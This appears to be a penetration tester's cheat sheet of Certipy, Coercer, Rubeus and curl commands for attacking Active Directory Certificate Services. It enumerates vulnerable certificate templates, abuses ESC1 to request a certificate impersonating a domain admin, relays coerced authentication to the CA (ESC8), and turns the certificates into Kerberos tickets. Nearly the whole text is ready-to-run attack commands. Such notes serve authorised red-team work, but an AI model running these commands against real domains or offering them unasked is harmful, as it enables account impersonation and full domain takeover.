Find all certs
certipy find -u user@domain.com -p '' -debug
- Hint: use
-scheme ldap
if you get a bunch of annoying ldap errors!)
Find all VULNERABLE certs
certipy find -vulnerable -u user@domain.com -p '' -debug
- Hint: use
-scheme ldap
if you get a bunch of annoying ldap errors!)
Abuse ESC1
sudo certipy req -username lowpriv@domain.com -password 'winter2021' -ca CA-01 -target vuln.domain.com -template 'vuln-template' -upn da-i-want-to-impersonate@domain.com -dns fqdn-of-a-dc.domain.com -key-size 4096
Auth with the cert you just got
certipy auth -pfx administrator.pfx -dc-ip
Abuse ESC8
certipy relay -target vulnca.domain.com -template DomainController / KerberosAuthentication /DC
Coerce auth
sudo python3 /opt/coercer/Coercer.py coerce -u x -p x -t x -l x
Abuse the cert
certipy auth -pfx blah.pfx -domain domain.com
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
Sanity check the CA is vulnerable to ESC8 with curl!
curl -sSLkI -u 'NETBIOS-NAME-OF-DOMAIN\user:password' --ntlm https://name.of.the.ca/certsrv/certfnsh.asp'
If you get 401 unauthorized
the endpoint has been hardened.
Note: if I call this file certipy.md
in the file hierarchy, docusaurus crashes. Wassupwitdat? I raised an issue in GitHub for this